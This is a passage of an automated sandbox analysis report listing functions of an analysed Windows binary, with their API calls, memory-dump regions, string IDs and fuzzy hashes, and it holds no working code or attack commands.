                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 4063778783-962849395
                                                                  • Opcode ID: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                  • Instruction ID: f8c27ee7699648d13f13efa6e74f78b5188a6d8a1a52f74fbe54ada12fea284d
                                                                  • Opcode Fuzzy Hash: f543cbc906ccd7650bb8cef791ecf8621ec6dbe073bee27d7945717985af6bf3
                                                                  • Instruction Fuzzy Hash: 7121D1B2A04209ABC710DF98D941ADAF7F8EB48314F10466FE558E3741D774AA40C7A5
                                                                  Function 00412D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409), ref: 00412DB5
                                                                  • LocalFree.KERNEL32(00000000,?,00000000), ref: 00412DEC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: FormatFreeLocalMessage
                                                                  • String ID: Error Code: %d
                                                                  • API String ID: 1427518018-2830492919
                                                                  • Opcode ID: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                  • Instruction ID: a3734aff581861bf4bd9e8a013a4e5c8eddb5f0eb71fb30c564b9f95807e7a34
                                                                  • Opcode Fuzzy Hash: 3415c24533acf48bc6660d8af8cfce90d1b605f354cacb28b3ad35756c2ea678
                                                                  • Instruction Fuzzy Hash: 7A21D672B04208AFC710DF99EC81BABF7B8FB48765F44413BE909D3380D6745D0086A4
                                                                  Function 00406CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(Command,Command), ref: 00406CF1
                                                                    • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,0040EFC6,?,?,?,?), ref: 00406EC3
                                                                    • Part of subcall function 00406EB0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,-00000001,?,?,?), ref: 00406EF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$AddressProc
                                                                  • String ID: Command$Could not resolve entrypoint '%hs'
                                                                  • API String ID: 2457830408-477499498
                                                                  • Opcode ID: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                  • Instruction ID: 02b3cd1bbd1a4042562dcd474d745e4de0b4e4c892e2f8a9ac46497f55fea694
                                                                  • Opcode Fuzzy Hash: a9f7127ece779c968760b600d952e9c33bb55f2fbd910c81e7ff8309745010cc
                                                                  • Instruction Fuzzy Hash: 89218B71700205AFD714DF58DC41BAAB7A9FF44324F01437AF926E73D1DB78A9048A98
                                                                  Function 00412320 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 004123E1
                                                                  • __CxxThrowException@8.LIBCMT ref: 004123F6
                                                                    • Part of subcall function 00401900: _memcpy_s.LIBCMT ref: 0040195A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_malloc_memcpy_sstd::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 1787139365-962849395
                                                                  • Opcode ID: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                  • Instruction ID: 6ea011b9a4285e4b5e01de87a8495eb2b241b38f0326e3fd5f69aa65fd4c8ce2
                                                                  • Opcode Fuzzy Hash: 388a42301bbcb7613fab76e40e9462ebc7aecf3065e82f0e0dac7605c1fedc70
                                                                  • Instruction Fuzzy Hash: 20219DB2A006499FCB10DFA8D541A9EFBF4FB48704F10866FE459E3741DB74AA00CBA5
                                                                  Function 00404AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 00404B96
                                                                  • __CxxThrowException@8.LIBCMT ref: 00404BAB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 4063778783-962849395
                                                                  • Opcode ID: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                  • Instruction ID: fe2611e71e1b4d3eab35b47a04658717641b3f6e96e165b590f39325d49202ba
                                                                  • Opcode Fuzzy Hash: 61c1e7d8d0493a0aa168af15573492feea997b9efbd426ed01a61629bdfa5d77
                                                                  • Instruction Fuzzy Hash: 811193B5900218DFCB00DF59D841BDEFBB4FB44754F10862EE815A7381D779A604CBA5
                                                                  Function 00410940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                  • std::exception::exception.LIBCMT ref: 004109EB
                                                                  • __CxxThrowException@8.LIBCMT ref: 00410A00
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                  • String ID: xsB
                                                                  • API String ID: 4063778783-962849395
                                                                  • Opcode ID: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                  • Instruction ID: 166044deac4ff419852e9ba3ba567c278087cb3695f227ff17d03246f23ed495
                                                                  • Opcode Fuzzy Hash: e868a53083fa1d7e98f619ebe31d704fd0f5ffdd214e531418ba4b8e1b0047f6
                                                                  • Instruction Fuzzy Hash: 1F21ACB5A00248DFCB00DF99C841ADAFBF4EB48B04F10856FE819A7342D734AA04CBA5
                                                                  Function 00406730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                    • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                  • std::exception::exception.LIBCMT ref: 004067BF
                                                                  • __CxxThrowException@8.LIBCMT ref: 004067D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                  • String ID: xsB
                                                                  • API String ID: 2621100827-962849395
                                                                  • Opcode ID: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                  • Instruction ID: 442295aed09c8a9df1bfa44d5f6881dde2d5152ee126d028579eef18df08d8eb
                                                                  • Opcode Fuzzy Hash: d8b1f9951333e666c1138fb743c057d0b6af5fc21088406b91705fcf76692e51
                                                                  • Instruction Fuzzy Hash: 3321FFB1900714CFC720DF5AC841A9AFBF4FB48714F104A2FE85AA3781E738A645CB99
                                                                  Function 004115E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00413B9C: _malloc.LIBCMT ref: 00413BB6
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413BEB
                                                                    • Part of subcall function 00413B9C: std::exception::exception.LIBCMT ref: 00413C05
                                                                    • Part of subcall function 00413B9C: __CxxThrowException@8.LIBCMT ref: 00413C16
                                                                  • std::exception::exception.LIBCMT ref: 0041166A
                                                                  • __CxxThrowException@8.LIBCMT ref: 0041167F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: std::exception::exception$Exception@8Throw$_malloc
                                                                  • String ID: xsB
                                                                  • API String ID: 2621100827-962849395
                                                                  • Opcode ID: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                  • Instruction ID: d126037be6ae07cf9ee6d5e3eb27cb285719d2fc9e1c908c41d8478ed4238dae
                                                                  • Opcode Fuzzy Hash: 5e83b65dfe0557c6d34ed6807040035208e33360ec2f6d9411a2bf6e0ed9750e
                                                                  • Instruction Fuzzy Hash: 3B21CDB1940314DFDB10DF95D901BDAB7F4EB04B08F00462EE906A7390E7B8A644CB99
                                                                  Function 00412580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000409,00000000,00000000,00000000,?,00000000,?,?,0040EF71), ref: 0041259F
                                                                  • LocalFree.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040EF71), ref: 004125DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
                                                                  Similarity
                                                                  • API ID: FormatFreeLocalMessage
                                                                  • String ID: Error Code: %d
                                                                  • API String ID: 1427518018-2830492919
                                                                  • Opcode ID: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                  • Instruction ID: 08fe6bb4c81252aca13f7875fe807113bfd974ddb72ba397d731f5de95ab752b
                                                                  • Opcode Fuzzy Hash: 1d525a71e8cb5eb276d91495dc9543d69531f819657fa8b75fdd5f8205834c02
                                                                  • Instruction Fuzzy Hash: 10012B32B00214BBD7305665AC56FDB775DDF85BA4F000167FE09DB280E5B0DE1082E8
                                                                  Function 0040DF50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memcpy_s.LIBCMT ref: 0040DF96
                                                                  • _memcpy_s.LIBCMT ref: 0040DFAA
                                                                    • Part of subcall function 00401000: __CxxThrowException@8.LIBCMT ref: 00401012
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1648532190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000001.00000002.1648514197.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648557175.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648579423.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648607823.0000000000431000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648629408.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648652860.000000000043A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648671835.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648693815.0000000000454000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648720807.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648819682.00000000004AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648873951.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648892612.00000000004B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1648920828.00000000004BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649041464.00000000005BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.00000000005FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1649101650.000000000062A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_400000_4JwhvqLe8n.jbxd
